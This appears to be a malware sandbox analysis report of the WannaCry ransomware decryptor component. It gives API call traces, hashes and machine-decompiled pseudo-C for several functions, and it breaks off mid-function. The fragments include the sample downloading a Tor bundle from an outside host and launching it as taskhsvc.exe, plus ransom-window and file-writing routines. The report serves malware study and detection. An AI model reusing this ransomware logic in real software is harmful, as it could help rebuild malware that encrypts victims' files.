                                                      0x0040b924
                                                      0x0040b929
                                                      0x0040b934
                                                      0x0040b939
                                                      0x0040b955
                                                      0x00000000
                                                      0x0040b93c
                                                      0x0040b945
                                                      0x0040b945
                                                      0x0040b8b0
                                                      0x0040b8b0
                                                      0x0040b8bc
                                                      0x0040b8c1
                                                      0x0040b8c6
                                                      0x00000000
                                                      0x0040b8c8
                                                      0x0040b8c8
                                                      0x0040b8d4
                                                      0x0040b8d9
                                                      0x0040b8de
                                                      0x00000000
                                                      0x0040b8e8
                                                      0x0040b8e8
                                                      0x0040b8e8
                                                      0x0040b8de
                                                      0x0040b8c6
                                                      0x0040b8ae

                                                      APIs
                                                      • sprintf.MSVCRT ref: 0040B87A
                                                      • GetFileAttributesA.KERNELBASE(?,?,?,?,00000000,?), ref: 0040B88D
                                                      • CreateProcessA.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9AA
                                                        • Part of subcall function 0040B6A0: CreateDirectoryA.KERNELBASE(?,00000000,?,76E83310,00000000,00000428), ref: 0040B6B4
                                                        • Part of subcall function 0040B6A0: DeleteFileA.KERNEL32(?), ref: 0040B6D9
                                                      • sprintf.MSVCRT ref: 0040B924
                                                      • GetFileAttributesA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
                                                        • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76E83310,00000428), ref: 0040B793
                                                        • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
                                                        • Part of subcall function 0040B780: DeleteUrlCacheEntry.WININET(?), ref: 0040B7DB
                                                        • Part of subcall function 0040B780: URLDownloadToFileA.URLMON(00000000,?,?,00000000,00000000), ref: 0040B7ED
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B815
                                                      • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
                                                      • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9CF
                                                      • WaitForSingleObject.KERNEL32(?,00007530,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040B9E2
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9EF
                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000,08000000), ref: 0040B9F6
                                                        • Part of subcall function 0040B780: DeleteFileA.KERNEL32(?), ref: 0040B82C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete$Create$AttributesCloseDirectoryHandleObjectSingleWaitsprintf$CacheCopyDownloadEntryNameProcessTemp
                                                      • String ID: %s\%s\%s$D$TaskData$Tor$https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip$s.wnry$taskhsvc.exe$tor.exe
                                                      • API String ID: 4284242699-3937372533
                                                      • Opcode ID: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction ID: 35d80fb58dc1195f77b7b167f0129d00e9adf464e01d9889cd120ecf7352bd78
                                                      • Opcode Fuzzy Hash: 09006d51623bf6324b32cedefd723180e41c2e4a94ec42060d8d8d083510f0e4
                                                      • Instruction Fuzzy Hash: 0C4137716443007AD710DBA4EC41BEBB7D4AFE8700F90883FF698532E1D6B99548879E
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405A60 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      C-Code - Quality: 94%
                                                      			E00405A60(void* __ecx) {
				char _v8;
				intOrPtr _v16;
				char _v24;
				char _v32;
				char _v40;
				char _v48;
				char _v56;
				char _v64;
				char _v72;
				char _v80;
				char _v88;
				char _v96;
				char _v104;
				char _v112;
				char _v120;
				void* _v140;
				void* _v928;
				void* _v932;
				void* _v936;
				void* _v1000;
				char _v1124;
				char _v1248;
				char _v1352;
				char _v1456;
				char _v1560;
				char _v1664;
				char _v1796;
				char _v1928;
				void* _v1992;
				void* _v2056;
				void* _v2120;
				char _v2212;
				char _v2216;
				intOrPtr _t144;

				_push(0xffffffff);
				_push(E00413A76);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t144;
				E0040B620(L"Wana Decrypt0r 2.0", 1);
				_push(0);
				L00412F08();
				L00412F02();
				L00412EFC();
				E004060E0( &_v2212, 0);
				_v8 = 0;
				 *((intOrPtr*)(__ecx + 0x20)) =  &_v2216;
				L00412B72(); // executed
				_v8 = 0x1d;
				_v24 = 0x415a30;
				E00403F20( &_v24);
				_v8 = 0x1c;
				_v32 = 0x415a30;
				E00403F20( &_v32);
				_v8 = 0x1b;
				_v40 = 0x415a30;
				E00403F20( &_v40);
				_v8 = 0x1a;
				_v48 = 0x415a44;
				E00403F20( &_v48);
				_v8 = 0x19;
				_v56 = 0x415a44;
				E00403F20( &_v56);
				_v8 = 0x18;
				_v64 = 0x415a44;
				E00403F20( &_v64);
				_v8 = 0x17;
				_v72 = 0x415a44;
				E00403F20( &_v72);
				_v8 = 0x16;
				_v80 = 0x415a44;
				E00403F20( &_v80);
				_v8 = 0x15;
				_v88 = 0x415a44;
				E00403F20( &_v88);
				_v8 = 0x14;
				_v96 = 0x415a44;
				E00403F20( &_v96);
				_v8 = 0x13;
				_v104 = 0x415a44;
				E00403F20( &_v104);
				_v8 = 0x12;
				E00403F90( &_v112);
				_v8 = 0x11;
				E00403F90( &_v120);
				_v8 = 0x10;
				L00412CC2();
				_v8 = 0xf;
				L00412CC2();
				_v8 = 0xe;
				L00412CC2();
				_v8 = 0xd;
				L00412CC2();
				_v8 = 0xc;
				L00412EF6();
				_v8 = 0xb;
				E004050A0( &_v1124);
				_v8 = 0xa;
				E004050A0( &_v1248);
				_v8 = 9;
				E00404170( &_v1352);
				_v8 = 8;
				E00404170( &_v1456);
				_v8 = 7;
				E00404170( &_v1560);
				_v8 = 6;
				E00404170( &_v1664);
				_v8 = 5;
				E00405D90( &_v1796);
				_v8 = 4;
				E00405D90( &_v1928);
				_v8 = 3;
				L00412EF0();
				_v8 = 2;
				L00412EF0();
				_v8 = 1;
				L00412D4C();
				_v8 = 0xffffffff;
				L00412C86();
				 *[fs:0x0] = _v16;
				return 0;
			}





































                                                      0x00405a60
                                                      0x00405a62
                                                      0x00405a6d
                                                      0x00405a6e
                                                      0x00405a85
                                                      0x00405a8a
                                                      0x00405a8c
                                                      0x00405a96
                                                      0x00405a9b
                                                      0x00405aa6
                                                      0x00405ab3
                                                      0x00405abe
                                                      0x00405ac1
                                                      0x00405ad2
                                                      0x00405add
                                                      0x00405ae4
                                                      0x00405af0
                                                      0x00405af8
                                                      0x00405aff
                                                      0x00405b0b
                                                      0x00405b13
                                                      0x00405b1a
                                                      0x00405b2b
                                                      0x00405b33
                                                      0x00405b3a
                                                      0x00405b46
                                                      0x00405b4e
                                                      0x00405b55
                                                      0x00405b61
                                                      0x00405b69
                                                      0x00405b70
                                                      0x00405b7c
                                                      0x00405b84
                                                      0x00405b8b
                                                      0x00405b90
                                                      0x00405b98
                                                      0x00405ba6
                                                      0x00405bb2
                                                      0x00405bba
                                                      0x00405bc1
                                                      0x00405bcd
                                                      0x00405bd5
                                                      0x00405bdc
                                                      0x00405be8
                                                      0x00405bf0
                                                      0x00405bf7
                                                      0x00405c03
                                                      0x00405c0b
                                                      0x00405c17
                                                      0x00405c1f
                                                      0x00405c2b
                                                      0x00405c33
                                                      0x00405c3f
                                                      0x00405c47
                                                      0x00405c53
                                                      0x00405c5b
                                                      0x00405c67
                                                      0x00405c6f
                                                      0x00405c7b
                                                      0x00405c83
                                                      0x00405c8f
                                                      0x00405c97
                                                      0x00405ca3
                                                      0x00405cab
                                                      0x00405cb7
                                                      0x00405cbf
                                                      0x00405ccb
                                                      0x00405cd3
                                                      0x00405cdf
                                                      0x00405ce7
                                                      0x00405cf3
                                                      0x00405cfb
                                                      0x00405d07
                                                      0x00405d0f
                                                      0x00405d1b
                                                      0x00405d23
                                                      0x00405d2f
                                                      0x00405d37
                                                      0x00405d43
                                                      0x00405d4b
                                                      0x00405d54
                                                      0x00405d5c
                                                      0x00405d65
                                                      0x00405d70
                                                      0x00405d7f
                                                      0x00405d8c

                                                      APIs
                                                        • Part of subcall function 0040B620: FindWindowW.USER32(00000000,00000000), ref: 0040B628
                                                        • Part of subcall function 0040B620: ShowWindow.USER32(00000000,00000005,00000000,?,00000000), ref: 0040B638
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FF,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B651
                                                        • Part of subcall function 0040B620: SetWindowPos.USER32(00000000,000000FE,00000000,00000000,00000000,00000000,00000043,?,00000000), ref: 0040B660
                                                        • Part of subcall function 0040B620: SetForegroundWindow.USER32(00000000), ref: 0040B663
                                                        • Part of subcall function 0040B620: SetFocus.USER32(00000000,?,00000000), ref: 0040B66A
                                                        • Part of subcall function 0040B620: SetActiveWindow.USER32(00000000,?,00000000), ref: 0040B671
                                                        • Part of subcall function 0040B620: BringWindowToTop.USER32(00000000), ref: 0040B678
                                                        • Part of subcall function 0040B620: ExitProcess.KERNEL32 ref: 0040B689
                                                      • #1134.MFC42(00000000,Wana Decrypt0r 2.0,00000001), ref: 00405A8C
                                                      • #2621.MFC42 ref: 00405A96
                                                      • #6438.MFC42 ref: 00405A9B
                                                        • Part of subcall function 004060E0: #324.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406107
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000,?,?,?,?,?,00000000,00413E0B,000000FF,00405AAB,00000000), ref: 00406117
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 0040612F
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 00406147
                                                        • Part of subcall function 004060E0: #567.MFC42(00000066,00000000), ref: 004061DF
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 004061F7
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406209
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406219
                                                        • Part of subcall function 004060E0: #540.MFC42(00000066,00000000), ref: 00406229
                                                      • #2514.MFC42 ref: 00405AC1
                                                        • Part of subcall function 00403F20: #2414.MFC42(?,?,?,004136B8,000000FF,00403F08), ref: 00403F4B
                                                        • Part of subcall function 00403F90: #2414.MFC42(?,?,?,004136D8,000000FF,00403F78), ref: 00403FBB
                                                      • #800.MFC42 ref: 00405C33
                                                      • #800.MFC42 ref: 00405C47
                                                      • #800.MFC42 ref: 00405C5B
                                                      • #800.MFC42 ref: 00405C6F
                                                      • #781.MFC42 ref: 00405C83
                                                        • Part of subcall function 004050A0: #800.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050CE
                                                        • Part of subcall function 004050A0: #795.MFC42(?,?,?,004138A8,000000FF,00405088), ref: 004050DD
                                                        • Part of subcall function 00404170: #2414.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041B2
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041C5
                                                        • Part of subcall function 00404170: #800.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041D2
                                                        • Part of subcall function 00404170: #795.MFC42(?,?,?,?,?,?,?,00404158), ref: 004041E1
                                                        • Part of subcall function 00405D90: #654.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DBE
                                                        • Part of subcall function 00405D90: #765.MFC42(00415A44,?,00000000,00413A88,000000FF,00405D14), ref: 00405DCD
                                                      • #609.MFC42 ref: 00405D37
                                                      • #609.MFC42 ref: 00405D4B
                                                      • #616.MFC42 ref: 00405D5C
                                                      • #641.MFC42 ref: 00405D70
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #800Window$#540#567$#2414$#609#795$#1134#2514#2621#324#616#641#6438#654#765#781ActiveBringExitFindFocusForegroundProcessShow
                                                      • String ID: 0ZA$DZA$Wana Decrypt0r 2.0
                                                      • API String ID: 3942368781-2594244635
                                                      • Opcode ID: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction ID: 9717df00861f10ea142a6202e5f0f29f583150bd1f0a7909c2c79a4805d5fd97
                                                      • Opcode Fuzzy Hash: e0fcef159a601972dbb815ea7c34e59d1ddbf6f278b0c37dd8899ed76481b774
                                                      • Instruction Fuzzy Hash: 3871B7345097C18EE735EB25C2557DFBBE4BFA6308F48981E94C916682DFB81108CBA7
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407A90 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 90COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 178 407a90-407ab7 179 407bf4-407c28 #2385 178->179 180 407abd-407ac5 178->180 181 407ac7 180->181 182 407aca-407ad1 180->182 181->182 182->179 183 407ad7-407af9 call 404c40 #2514 182->183 186 407b72-407bef #2414 * 2 #800 #641 183->186 187 407afb-407b6d #537 #941 #939 #6876 * 2 #535 call 4082c0 #800 183->187 186->179 187->186
                                                      C-Code - Quality: 68%
                                                      			E00407A90(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				char _v20;
				intOrPtr _v24;
				char _v32;
				void* _v36;
				char _v44;
				char _v132;
				char* _v136;
				void* _v140;
				void* _v144;
				void* _v148;
				void* _v152;
				char _v160;
				intOrPtr _v164;
				char _v168;
				void* _v180;
				intOrPtr _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t70;
				intOrPtr _t72;
				intOrPtr _t73;

				_push(0xffffffff);
				_push(E00413F17);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t72;
				_t73 = _t72 - 0x80;
				_t70 = __ecx;
				if(_a4 == 0x1388) {
					_t43 = __ecx + 0x2f8;
					if(_t43 != 0) {
						_t43 =  *((intOrPtr*)(_t43 + 0x20));
					}
					if(_a8 == _t43) {
						_t44 = E00404C40( &_v132, 0);
						_v8 = 0;
						L00412B72();
						if(_t44 == 1) {
							_push("***");
							L00412CAA();
							_push("\t");
							_v8 = 1;
							L00412F68();
							_push( &_v44);
							L00412F62();
							_push(0x3b);
							_push(0xa);
							L00412F5C();
							_push(0x3b);
							_push(0xd);
							L00412F5C();
							_push(1);
							_v164 = _t73;
							L00412F56();
							E004082C0(_t70,  &_v168,  &_v160);
							_v44 = 0;
							L00412CC2();
						}
						_v4 = 2;
						_v20 = 0x415c00;
						_v136 =  &_v20;
						_v4 = 5;
						L00412D52();
						_v20 = 0x415bec;
						_v136 =  &_v32;
						_v32 = 0x415c00;
						_v4 = 6;
						L00412D52();
						_v32 = 0x415bec;
						_v4 = 2;
						L00412CC2();
						_v4 = 0xffffffff;
						L00412C86();
					}
				}
				_t42 = _a8;
				_push(_a12);
				_push(_t42);
				_push(_a4);
				L00412BAE(); // executed
				 *[fs:0x0] = _v24;
				return _t42;
			}


























                                                      0x00407a96
                                                      0x00407a98
                                                      0x00407a9d
                                                      0x00407aa2
                                                      0x00407aa9
                                                      0x00407ab5
                                                      0x00407ab7
                                                      0x00407abd
                                                      0x00407ac5
                                                      0x00407ac7
                                                      0x00407ac7
                                                      0x00407ad1
                                                      0x00407add
                                                      0x00407ae6
                                                      0x00407af1
                                                      0x00407af9
                                                      0x00407afb
                                                      0x00407b04
                                                      0x00407b09
                                                      0x00407b12
                                                      0x00407b1a
                                                      0x00407b27
                                                      0x00407b28
                                                      0x00407b2d
                                                      0x00407b2f
                                                      0x00407b35
                                                      0x00407b3a
                                                      0x00407b3c
                                                      0x00407b42
                                                      0x00407b47
                                                      0x00407b50
                                                      0x00407b55
                                                      0x00407b5c
                                                      0x00407b65
                                                      0x00407b6d
                                                      0x00407b6d
                                                      0x00407b72
                                                      0x00407b81
                                                      0x00407b89
                                                      0x00407b91
                                                      0x00407b99
                                                      0x00407ba2
                                                      0x00407baa
                                                      0x00407bae
                                                      0x00407bba
                                                      0x00407bc2
                                                      0x00407bcb
                                                      0x00407bd3
                                                      0x00407bdb
                                                      0x00407be4
                                                      0x00407bef
                                                      0x00407bef
                                                      0x00407ad1
                                                      0x00407bfb
                                                      0x00407c09
                                                      0x00407c0a
                                                      0x00407c0b
                                                      0x00407c0e
                                                      0x00407c1b
                                                      0x00407c28

                                                      APIs
                                                      • #2514.MFC42 ref: 00407AF1
                                                      • #537.MFC42(***), ref: 00407B04
                                                      • #941.MFC42(00421234,***), ref: 00407B1A
                                                      • #939.MFC42(?,00421234,***), ref: 00407B28
                                                      • #6876.MFC42(0000000A,0000003B,?,00421234,***), ref: 00407B35
                                                      • #6876.MFC42(0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B42
                                                      • #535.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B55
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B6D
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407B99
                                                      • #2414.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BC2
                                                      • #800.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BDB
                                                      • #641.MFC42(?,?,00000001,0000000D,0000003B,0000000A,0000003B,?,00421234,***), ref: 00407BEF
                                                      • #2385.MFC42(?,?,?), ref: 00407C0E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2414#6876#800$#2385#2514#535#537#641#939#941
                                                      • String ID: ***$[A$[A
                                                      • API String ID: 3659526348-3419262722
                                                      • Opcode ID: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                                      • Instruction ID: 6b54b999ec918a2e7db5809f8de8f0b59fd624410e6f3b71b4409e3b9ece79cc
                                                      • Opcode Fuzzy Hash: aba664889de062b5968d276a4ab1c1a83eae795fd60498f81a51ba759143eada
                                                      • Instruction Fuzzy Hash: D5416A3410C781DAD324DB21C541BEFB7E4BB94704F408A1EB5A9832D1DBB89549CF67
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004063A0 Relevance: 22.6, APIs: 15, Instructions: 82COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 223 4063a0-4064b5 #2302 * 12 #2370 * 3
                                                      APIs
                                                      • #2302.MFC42(?,0000040F,?), ref: 004063B2
                                                      • #2302.MFC42(?,000003EC,?,?,0000040F,?), ref: 004063C4
                                                      • #2302.MFC42(?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063D6
                                                      • #2302.MFC42(?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063E8
                                                      • #2302.MFC42(?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?,0000040F,?), ref: 004063FA
                                                      • #2302.MFC42(?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?,000003EC,?,?), ref: 0040640C
                                                      • #2302.MFC42(?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?,000003EB,?,?), ref: 0040641E
                                                      • #2302.MFC42(?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?,000003F3,?,?), ref: 00406430
                                                      • #2302.MFC42(?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?,000003F4,?,?), ref: 00406442
                                                      • #2302.MFC42(?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?,000003F5,?,?), ref: 00406454
                                                      • #2302.MFC42(?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?,000003F2,?,?), ref: 00406466
                                                      • #2302.MFC42(?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?,000003EE,?,?), ref: 00406478
                                                      • #2370.MFC42(?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?,000003F9,?,?), ref: 0040648A
                                                      • #2370.MFC42(?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?,00000401,?,?), ref: 0040649C
                                                      • #2370.MFC42(?,000003EF,?,?,000003FC,?,?,000003FF,?,?,000003E8,?,?,000003FD,?,?), ref: 004064AE
                                                      Memory Dump Source
                                                      • Source File: 00000019.00000002.7374755422.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000019.00000002.7374680120.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375004483.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375200339.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375280551.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000019.00000002.7375363659.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2302$#2370
                                                      • String ID:
                                                      • API String ID: 1711274145-0
                                                      • Opcode ID: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction ID: 0d28d22553b71fc94a0ee6c66579bb390b9294cd647fac9b7e1ecc0347327b15
                                                      • Opcode Fuzzy Hash: f4b882eb859de0a193a05a3978ec51d1331cae20c00cf70a3d190a6334ff0923
                                                      • Instruction Fuzzy Hash: 32218E711806017FE22AE365CD82FFFA26CEF85B04F00452EB369951C1BBE8365B5665
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00412360 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 366COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 319 412360-412376 320 412378-41237b 319->320 321 41239c-4123a8 319->321 324 412381-412384 320->324 325 412499-4124a1 320->325 322 412414-412438 call 411810 321->322 323 4123aa-4123ad 321->323 342 41243a-412445 call 411ac0 322->342 343 41244c-412452 322->343 326 4123ba-4123c6 323->326 327 4123af-4123b7 call 411ac0 323->327 324->325 331 41238a-412399 324->331 329 4124a3-4124ab call 411ac0 325->329 330 4124ae-4124bd 325->330 336 4123c8-4123d7 326->336 337 4123da-4123dd 326->337 327->326 329->330 332 4124d1-4124d4 330->332 333 4124bf-4124ce 330->333 339 4124d6-4124dc call 411390 332->339 340 4124df-4124e4 332->340 344 4123e8-4123ed 337->344 345 4123df-4123e5 call 411390 337->345 339->340 349 4124f6-41250e call 411cf0 340->349 350 4124e6-4124f4 call 4113e0 340->350 342->343 351 412463-412465 343->351 352 412454-412460 343->352 354 4123ff-412411 call 411660 344->354 355 4123ef-4123fd call 4113e0 344->355 345->344 369 412510-412513 349->369 370 412578-41257b 349->370 350->349 360 412467-412476 351->360 361 412479-412496 351->361 354->322 355->354 373 412515-412521 369->373 374 412524-41252f 369->374 371 412589-412598 370->371 372 41257d-412584 370->372 378 41259a-41259c 371->378 379 4125ad-4125d8 371->379 377 412632-412635 372->377 375 412531-412533 374->375 376 41253f-412556 call 412250 374->376 375->376 380 412535-412537 375->380 384 412637-412646 377->384 385 41269e-4126b8 call 411660 377->385 386 4125a2 378->386 387 41259e-4125a0 378->387 381 412649-412658 379->381 382 4125da 379->382 389 412559-412575 call 412250 380->389 390 412539-41253d 380->390 393 412671-412699 wsprintfA call 412250 381->393 394 41265a-41265c 381->394 391 4125df-41260a wsprintfA call 412250 382->391 401 4126ba-4126c7 #823 385->401 402 4126cd-4126d3 385->402 395 4125a5-4125ab 386->395 387->386 387->395 390->376 390->389 408 41260d-412630 CreateFileA 391->408 393->408 394->393 399 41265e-412660 394->399 395->378 395->379 399->391 405 412666-41266b 399->405 401->402 407 4126db-4126fc call 411810 402->407 405->391 405->393 411 412728-412730 407->411 412 4126fe-412700 407->412 408->377 415 412765-41276d 411->415 413 412702 412->413 414 41273c-412744 412->414 418 412704-412718 WriteFile 413->418 419 41271a-412720 413->419 414->415 416 412776-41278f call 411ac0 415->416 417 41276f-412770 FindCloseChangeNotification 415->417 417->416 418->419 421 412732-41273a 418->421 422 412722-412724 419->422 423 412746-41275f SetFileTime 419->423 421->415 422->414 425 412726 422->425 423->415 425->407
                                                      C-Code - Quality: 95%
                                                      			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v0;
				char _v260;
				struct _FILETIME _v268;
				struct _FILETIME _v276;
				struct _FILETIME _v284;
				void* _v292;
				void* _v296;
				signed int _v304;
				char _v560;
				struct _OVERLAPPED* _v820;
				void* _v824;
				void* _v827;
				void* _v828;
				long _v829;
				void* _v836;
				intOrPtr _t68;
				long _t77;
				void* _t81;
				void* _t82;
				void* _t90;
				void* _t91;
				long _t94;
				signed int _t97;
				long _t99;
				void* _t104;
				void* _t106;
				int _t116;
				long _t121;
				signed int _t132;
				signed int _t138;
				unsigned int _t140;
				signed int _t141;
				void* _t154;
				intOrPtr* _t157;
				intOrPtr _t166;
				void* _t174;
				signed int _t175;
				signed int _t176;
				long _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t180;
				void* _t182;
				long _t183;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				void* _t192;

				_t166 = _a16;
				_t132 = __ecx;
				if(_t166 == 3) {
					_t68 =  *((intOrPtr*)(__ecx + 4));
					_t176 = _a4;
					__eflags = _t176 - _t68;
					if(_t176 == _t68) {
						L14:
						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
						__eflags = _t177;
						if(_t177 <= 0) {
							E00411AC0( *_t132);
							 *(_t132 + 4) = 0xffffffff;
						}
						__eflags = _v829;
						if(_v829 == 0) {
							__eflags = _t177;
							if(_t177 <= 0) {
								asm("sbb eax, eax");
								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
								__eflags = _t77;
								return _t77;
							} else {
								return 0x600;
							}
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = _t68 - 0xffffffff;
						if(_t68 != 0xffffffff) {
							E00411AC0( *((intOrPtr*)(__ecx)));
							_t187 = _t187 + 4;
						}
						_t81 =  *_t132;
						 *(_t132 + 4) = 0xffffffff;
						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
								E00411390(_t81);
								_t187 = _t187 + 4;
							}
							_t82 =  *_t132;
							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
